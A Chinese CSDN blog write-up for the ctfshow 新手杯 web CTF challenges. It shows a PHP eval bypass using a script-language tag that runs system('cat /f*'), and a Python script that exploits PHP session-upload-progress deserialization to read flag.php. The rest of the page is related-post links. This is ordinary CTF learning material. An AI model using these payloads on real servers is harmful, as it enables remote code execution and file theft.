ctfshow web 新手杯

最新推荐文章于 2024-10-12 11:06:21 发布
最新推荐文章于 2024-10-12 11:06:21 发布
阅读量199 收藏
点赞数 1
文章标签: android web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/139115890
版权

easy_eval

<?php

error_reporting(0);
highlight_file(__FILE__);

$code = $_POST['code'];

if(isset($code)){

  $code = str_replace("?","",$code);
  eval("?>".$code);

}

eval("?>".$code);闭合了php我们使用script重新开启
code=<script language="php">system('cat /f*');</script>

剪刀石头布

session 反序列化
import requests 
url="https://75ddb6b9-251a-4738-a8de-e8574f54d864.challenge.ctf.show/"
sess="yu22x"
data={'PHP_SESSION_UPLOAD_PROGRESS':'|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}'}
files={'file':'1'}
r = requests.post(url,data=data,files=files,cookies={'PHPSESSID':'yu22x'})
print(r.text)

baby_pickle

repairman

简单的数据分析

baozongwi
关注
CTFShow 2022——新手wp WEB题目
qq_60878323的博客
10-09 1242
小艾大佬的投稿支持 web AK了
ctfshow 新手 web
shinygod的博客
10-09 772
基础练习
CTFshow新手WP
qq_49746811的博客
10-06 1308
CTFshow新手WP
ctfshow新手-[easy-eval]
weixin_52116519的博客
10-11 931
【代码】ctfshow新手-[easy-eval]
Web】CTFSHOW 新手 题解
uuzeray的博客
05-02 674
先本地起个服务,先直接请求,再请求?name=Z3r4y,拿到new_rookie_info和Z3r4y_info。对比一下,其实就是要让I3为I1就可,sb后的.起到截断作用,id在name之后,name是我们可控的。$secret为$_COOKIE[secret],直接引用绕过了。可以在/change路由进行打入,用newname替换name。打PHP_SESSION_UPLOAD_PROGRESS。运行结果插到cookie里,而后便可为所欲为。当id为0时可以拿到flag。令mode为0看到源码。
ctfshow新手web
m0_62422842的博客
10-07 2459
前天ctfshow举办的新手,里面的部分web题对于我来说还是有必要记录一下的。里面的大师傅都太强了。还有最后一道web,看了官方wp,有种本能的抗拒。这种题涉及的知识点超出了我的学习范围。还得继续积累知识,向大师傅们学习。
ctfshow新手wp
aarong的博客
10-10 1441
最近国庆在疯玩的时候抽空做了几题,简单记录一下。
CTFshow-菜狗-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1130
ctfshow-web入门-爆破wp
ctfshow--web入门题目1-20
weixin_50888622的博客
11-16 1752
web-1 where is flag? 此题直接点击F12,查看其源代码就可以找到flag ctfshow{1121142c-011b-43e7-9268-7bc9b5024a75} 2.web-2无法查看源代码: 从更多工具里面有一个开发人员工具,打开点击索引就可以找到flag ctfshow{d73c7c81-36de-42e9-bbc5-13a9b2a80677} web-3 第一种方法:在打开链接后发现还是where is flag 通过F12,在网络里面的响应头里面发现了flag c.
CTFSHOW新手MISC部分WriteUp
javagty6778的博客
01-09 572
简单做了一下CTFSHOW新人的MISC等部分的题目,收获还是挺大的,有兴趣的小伙伴可以去官网尝试做一下,如果喜欢本文不妨一键三连支持一下。
安卓的漏洞类型和扫描工具
xxdw1992的博客
10-09 789
Android应用由多个组件组成,这些组件中的漏洞可能导致严重的安全问题。常见的组件漏洞包括:Activity组件漏洞:Activity是Android应用中的一个核心组件,用于显示用户界面。如果Activity组件存在漏洞,如崩溃或异常,那么其他应用可能会利用这些漏洞导致应用崩溃或进行功能调用。此外,Activity接口如果被其他应用调用,还可能用于执行特定的敏感操作或进行钓鱼欺骗。Service组件漏洞:Service是Android应用中的另一个重要组件,用于在后台执行长时间运行的操作。
Android 编译使用哪个key签名?
m0_63526467的博客
10-10 570
Android 编译使用哪个key签名?
Android笔记(二十四)基于Compose组件的MVVM模式和MVI模式的实现
userhu2012的博客
10-09 694
仔细研究了一下MVI(Model-View-Intent)模式,发现它和MVVM模式非常的相识。在采用Android JetPack Compose组件下,MVI模式的实现和MVVM模式的实现非常的类似,都需要借助ViewModel实现业务逻辑和视图数据和状态的传递。在这篇文章中,将通过简单的货币兑换实例来展示一下MVVM模式和MVI模式的不同。
php命令行工具的使用,包括查看版本,扩展和如何快速开启php内置web服务等工具的用法示例
10-07 815
在我们安装好php后,php内置的有很多的命令行可供,我们使用,以下是一些非常有用的常用命令行工具。
安卓-广播
最新发布
qq_34358193的博客
10-12 564
广播机制允许一个应用向多个其他应用或系统组件发送消息,而接收方不需要事先知道谁发送了这些消息。系统广播:由系统发出的广播,用于通知设备状态的变化(如电量低、网络状态变化等)。自定义广播:应用程序可以定义自己的广播,用于应用内不同组件间的通信。广播接收器是一个专门用于接收广播消息的组件。当广播发送到时,系统会调用广播接收器的方法。广播机制在 Android 中为不同组件之间的通信提供了灵活的方式,尤其是系统广播可以帮助应用了解设备状态的变化。
Android kotlin密封类-基本使用
赵星海的博客
10-09 510
密封类(Sealed Classes)是一种特殊的类,它可以有一组受限的子类。与普通的基类不同,密封类的所有子类都必须在与密封类相同的文件中声明。这种限制使得密封类非常适合于表示固定的类层次结构,特别是在使用 when 表达式时。表示 UI 的不同状态,如加载、成功和错误。
ctfshow菜狗web
09-07
ctfshow菜狗web是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值